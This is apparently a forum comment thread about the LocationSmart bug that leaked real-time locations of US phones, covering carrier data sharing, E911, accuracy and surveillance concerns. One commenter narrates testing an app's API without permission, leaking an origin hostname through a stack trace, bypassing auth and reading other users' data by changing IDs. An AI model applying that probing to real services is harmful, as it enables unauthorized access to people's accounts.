What is going on here doesn't make any sense. Basically the carriers give access to the data of EVERYONE, and the last link in the chain is the one that's supposed to check the "opt-in"? Meaning everyone in the chain in between gets access?
Carrier. LocationSmart must respect the user preference set with the carrier. It is the carrier's/consumer's data, ultimately, so it is between the consumer and the carrier. LocationSmart is downstream and must respect the privacy wishes of the consumer/carrier. There are two layers of problems here: (1) the carrier could just /never/ provide data to LS if the user did not opt in; (2) LS could avoid having terrible bugs. Problem (1) is hard. So carriers just give companies like LS full access to location data along with the users' preferences, and LS agrees to respect users' wishes.
I think the carriers carry way more blame in this whole thing than people in this thread are acknowledging. Users that didn't opt in are still having their data made available to these third parties because it's easier to implement. It reminds me of the legal fiction the NSA uses: they collect ALL the data/traffic, but they can only ACCESS the data with a warrant. In this case, the virtual firewall between the carrier and LS leaks horribly, and the incentive to make it strong does not exist. Totally different situation, but the parallels are there.
Posting under an alternative account for obvious reasons.
Bad APIs used in IoT are a huge attack vector, and too few companies in the mobile-first world have a bug bounty program. I found a similar problem with an API for an app that comes installed by default on most Android phones I've purchased (think smartphone as a TV remote). I reported it and got no response. Their homepage claims the app is being used by tens of millions of smart devices like A/Cs, TVs, fridges, microwaves, etc. The vulnerability allowed full account access.
If you've made every attempt at responsible disclosure and have gotten no response, it's probably more irresponsible to not do a full post on it.
Then again, that of course gets into murky water, and it's best to at least try to get legal counsel or work with a responsible disclosure website. IANAL.
The gist of the vulnerability was an expectation that nobody would ever find their origin server if it had some crazy hostname:
"asuhdfo8a7ys8dfas.website.com" type of setup. In front of this origin they had a server that did auth and auth only. If your auth worked at the edge, the request was sent to the origin. The problem is that I found a specific input that caused an error, dumping a stack trace that contained the origin hostname. I took the original request and replayed it directly against the origin. To my surprise, the response was the same as going through the auth server. Then I changed the user id to some integer that wasn't mine and got information back. Then I quit playing with it and sent an email.
This leaves me in a weird spot, because I was fuzzing them looking for details while fully aware they did not have a bug bounty program. Why did I do this? Because I was using the app myself, I'm a security guy, and I had read about a cool exploit involving the Uber app. It only took about 5 minutes of setting up Burp proxy for my phone with SSL and 5 more minutes of auditing to find an input that dumped the stack trace.
I just wrote to my senators and representative in congress, and I urge everyone else to do the same. It is unacceptable that our personal information is so easily sold to 3rd parties by our cell phone carriers, with no way to opt-out.
This is what I sent... feel free to mention any issues you see with it which may help other people.
Hello XX,
I am concerned about the security of my cell phone location information.
Yesterday, a vulnerability was found that leaked the real-time location of 95% of the cell phones in the US. That is unacceptable.
US cell phone carriers, including AT&T, Sprint, T-Mobile and Verizon, share personal information, including phone numbers and the real-time location of cell phones, with companies such as LocationSmart, which then resell the information to other companies for marketing and other purposes. Carriers do not provide a way for users to opt out of such sharing. This is completely legal under the current Electronic Communications Privacy Act. LocationSmart claims that they will not share the gathered information without user consent, but the definition of consent is vague, and that doesn't protect the public from security breaches. I understand that carriers need to have location data to comply with emergency 911 regulations, but it is unacceptable that they are able to share it with 3rd parties who may use it for dubious purposes, and who may have lax security standards.
We need laws that protect the privacy of cell phone users and do not allow carriers to sell personal information to 3rd parties. Or, at the very least, customers should be able to opt out of such sharing by their carriers.
> Also, by law wireless companies need to be able to ascertain at any time the approximate location of a customer’s phone in order to comply with emergency 911 regulations.
Would it be unfeasible to only track once a 911 call is placed?
Remember they need to know which cell(s) you're within range of to get inbound calls to you.
It's not like the networks send a message out via every cell tower on the planet asking if $rolandog{'mobile_number'} is listening every time you get a call or text.
Whenever your phone is switched on, it regularly contacts the tower it's got the strongest signal from and says "Hi, it's rolandog's phone here, if you get a call for me, this is where I'm hanging out! kthxbye"
Well, it would probably add a bit of time, and there are also cases where, say, someone is kidnapped and the phone is still on them, but obviously we can't ask them to opt in right then. Not that any of that would justify having a system to sell your location, but presumably they thought they had it locked down so that consent was required (which it apparently was for the XML version of the API).
I don't think the general public will care. I tried to warn people about security/surveillance for a while, but people don't seem to care. I even used http://www.insecam.org/ to show people their children might end up on the Internet; they just say "I don't have a camera in my house". But they are not grasping my point, which is that technology is invasive to a degree no one imagined before. Soon the facial camera on your fridge, used to authenticate a new food order you make through Amazon, will be on insecam if you are not careful. And of course, the most dangerous thing is not accessing a camera, microphone or location at time T, but the whole history: years, even decades of history of your every move. Nobody is perfect; don't tell me you'd never be at a place you shouldn't have been. Information is power, and those with access to that information will control society as a whole.
Anyone know what the minimum and maximum accuracy of these cell phone triangulation methods is? This article states that they were getting results accurate to anywhere from within a few hundred yards to 1.5 miles.
And the scariest thing to me in the article (besides being able to bypass the auth) is that they were able to send several requests and track movement in near real time. Did they really not have a request limiter in place?
No request limiter, but the API was kind of slow (a few seconds per update). The API returned an accuracy value, but we found it was often underestimating the accuracy (i.e. when it said "3000m", we were getting closer to 500m).
There is coarse and fine location. https://androidforums.com/threads/question-regarding-the-cou... -- generally you will get a coarse location. Carriers can often get a precise location by querying the phone and enhancing the coarse fix (cell tower triangulation) with a GPS reading. Fine location is not going to be available on all handsets; it will be accurate to around 30 meters. Older handsets or those on 3G may not provide fine location.
For whatever it's worth, this service was unable to find any location for my phone that only connects over 2g, but had no problem tracking my 4g phone with startling accuracy.
This is true, but I suspect something else might be going on. LocationSmart said it couldn't find the location of my phone at all, but even if I'm visible to only one tower it should at least be able to narrow it down to the location of that tower.
"Phase II E911 rules require wireless service providers to provide more precise location information to PSAPs; specifically, the latitude and longitude of the caller. This information must be accurate to within 50 to 300 meters depending upon the type of location technology used."
So... 300 million connected devices, 2 bytes for location, some compression, 2 samples a minute -> about 1 GB per minute, or roughly 1.5 TB per day. That's easy storage for the NSA; I wonder how many years of data they have on everyone? Don't think for a minute they don't have an exception to the permission requirements.
Would NSA require a third party website's API to amass phone geo-location data considering the fact that they might as well exploit the carrier provided APIs?
Two bytes for a location? If you're going to store latitude and longitude, you'll want to do it with signed fixed-precision numbers. Four decimal places if you don't care about accuracy too much plus up to 180 above and below zero. That means you'll need 26 bits (25 bits to store the data plus one bit for sign), and that covers one half of latitude and longitude. You'd need 52 bits to store a full set of coordinates, and since we're not barbarians we can round that up to a nice even 64 bits (I don't think there's anything relevant you can store in 12 bits...maybe carrier ID?)
Then you need to identify what device it's for, that's another 32 bits if you're being conservative. I'll ignore timestamp, since you could infer that from the location in the data store (assuming you have nice even 30s intervals), but it would otherwise be a bonus 64 bits.
That's 10TB, but also pretty useless because you've got a giant pile of u32s. If you were going to do this for real, you'd probably store the user's location with full precision for the first sample, then simply have diffs with a precision that assumes, say, the device isn't going to move faster than the speed of sound. The index is likely going to be pretty massive, and you'll constantly be reindexing because you're getting new data all the time (with a cardinality of 300M).
Even then, you're probably looking at something that's triple or quadruple that size. Let's say 40TB. That's only 14.6PB/year, which is not unreasonable storage for the government. But then you need to consider other things:
- You're ingesting 600M data points per minute. If you're only getting the minimum (96 bits/record), that's over 7 GB per minute.
- But of course, it's probably not in a binary format (in the article, it was JSON and XML). Make that around 50 GB per minute.
- Now you're parsing XML and JSON. That's not free when you're parsing 600M documents/minute. You'd likely need a pretty damn big server farm to ingest all this data.
- Your carriers need to be able to send that data to you, so they need to be equipped to (collectively) deliver ~50 GB per minute of encoded location data; not to mention be able to dump the latest record for every customer in their location database twice per minute.
I wouldn't bet money that the government cares enough about every last device in the country to rig together such a big system only to keep track of where my grandmother's Jitterbug is. It's nonsensical to think that they couldn't just send an API request to AT&T or Verizon and be like "Hey guys, where's John Doe's phone been in the last week?" That's almost certainly more practical and cost effective in every way.
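For reference, here is the back-of-envelope arithmetic from the two estimates above as a tiny Python script. Every input (record size, sample rate, the x7 JSON/XML inflation factor) is just an assumption stated in the comments, not a measured value.

    DEVICES = 300_000_000
    SAMPLES_PER_MIN = 2
    BITS_PER_RECORD = 96          # 64-bit packed lat/lon + 32-bit device id
    WIRE_INFLATION = 7            # rough blow-up factor for a JSON/XML wire format

    points_per_min = DEVICES * SAMPLES_PER_MIN                      # 600 million/min
    raw_gb_per_min = points_per_min * BITS_PER_RECORD / 8 / 1e9     # ~7.2 GB/min binary
    wire_gb_per_min = raw_gb_per_min * WIRE_INFLATION               # ~50 GB/min encoded
    raw_tb_per_day = raw_gb_per_min * 60 * 24 / 1e3                 # ~10 TB/day raw
    pb_per_year_at_40tb = 40 * 365 / 1e3                            # ~14.6 PB/yr at 40 TB/day

    print(raw_gb_per_min, wire_gb_per_min, raw_tb_per_day, pb_per_year_at_40tb)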
You are right, it would take a few more bytes than that, but my point was more that the amount of data is entirely within the scope of the NSA et al. In fact, it was somewhat arbitrary to say two points a minute; in reality, once every two minutes is enough to have a very good idea of where somebody is or has gone.
Why would they want this data? Because they want to be able to not just track in real time 'persons of interest' but also to recreate past movements to establish associations.
As to the difficulty (if any) for the major telecoms of providing such a feed - it's chump change for the NSA to assist in that matter, just as regular law enforcement pays for wiretaps.
Are there any US carriers that have been confirmed to not share location data with 3rd parties such as LocationSmart? LocationSmart boasts on their website that they can get the location of 95% of the cell phones in the US... how can I be that 5%?
It's a bit naive to believe that the soft power button or airplane mode disables periodic tower pings. A removable battery and a shielded bag would be the minimum precaution.
Phones wake up about every 30 minutes or so when "powered off", explicitly to report location and perform background chores. So you are right. Even the removable battery is suspect. A foil/metal-lined bag does the trick. Or a chip bag: https://www.google.com/amp/s/www.popularmechanics.com/techno...
Something I wonder reading this; hopefully some wireless experts can answer. In theory, does LocationSmart even need to onboard all telcos for this? Most smartphones have the hardware to talk to all telcos now, and in emergency situations they can roam onto other networks. Do LTE devices ping other networks, or do they only ping on the spectrum of their particular network?
I’ve heard stories of how telcos track down things like broken fridges etc that are adding noise to their network (and buy the owners a new fridge) so clearly they have the ability to track things that aren’t part of their network.
So we pay the carriers and they sell our locations to 3rd parties anyway?
I can't think of any business for which it should be reasonable to make additional money by selling users' data. If a service is free, I can understand that somehow the bills have to be paid and that selling data is an obvious option. But if you paid for a service, you normally don't expect the service provider to sell your data anyway. That kind of business should be illegal IMHO.
After all the brouhaha over the Cambridge Analytica dataset, which only revealed data that people voluntarily submitted to a public service - I wonder if there will be a congressional hearing about a service that allows anyone to track anybody owning a cellphone (which is pretty much everybody) anytime, anywhere, with no recourse or opt-out? With the heads of AT&T and other companies being interrogated by Congressmen, at least? And if not, why not?
T-Mobile and other carriers sell customers a service that uses this information to track other phones ON THE SAME ACCOUNT. The actual service is provided by a third party that, I assume, is privy to all customers' tower contacts and thus their locations. By the way, the service is usually accurate to within 50 feet, although I have found some bloopers where it was off by 500 feet. Each result even tells you how accurate it likely is.
I kinda had no clue 3rd-party services like this existed, and assumed realtime cellphone location data was only available to law enforcement in emergency situations... Cool..
I was referring specifically to the inevitability of observation technologies slipping outside their controllers' grasp and becoming increasingly ubiquitous.
... but as Brin observes, these tools are powerful. And the groups that exploit them will tend to become the powerful groups (because information is power).
So given that these tools, even when abused, don't lead to the kind of wanton destruction nuclear weapons do (the kind that triggers our primal survival instincts), the odds of everyone on the planet generally refraining from using surveillance technologies when available are low, and those who do use them will tend to become more powerful (and therefore spread the cultural meme that "hey, this stuff is okay in moderation").
By the way, I wonder, could a foreign state use these location services for spying on government and military officials and other interesting people? For example, create a fake marketing company and buy data for "targeted advertising".
I don’t believe the buggy API was ever restricted just to US IPs, so anyone in any country could have been tracking US phones since the API came out (in Jan 2017 or earlier).
Maybe this is not a security vulnerability but a feature, intentionally put there as a backdoor. It would not be the first time such behaviour has been observed.
Per the LocationSmart website: "95% of all wireless devices" so basically the entire population's location can be tracked in real-time by anyone willing to pay for this service. Insurance companies, your boss, etc.
Yes. Data-only SIMs are just like your regular SIM cards, except you pay to NOT make any calls with them. Everything else works the same from a technical point of view.
To avoid this sort of information leak, they'd have to build out their own cell infrastructure. This would be prohibitively expensive, even for a company with as much money as Apple.
Operating as a MVNO wouldn't help; the parent carrier can still collect data from their customers.
Having not fully woken up this morning, I misread the title as "LocationSmart Leaked Location Data for All Major U.S. [Aircraft] Carriers in Real Time" and freaked out a bit :)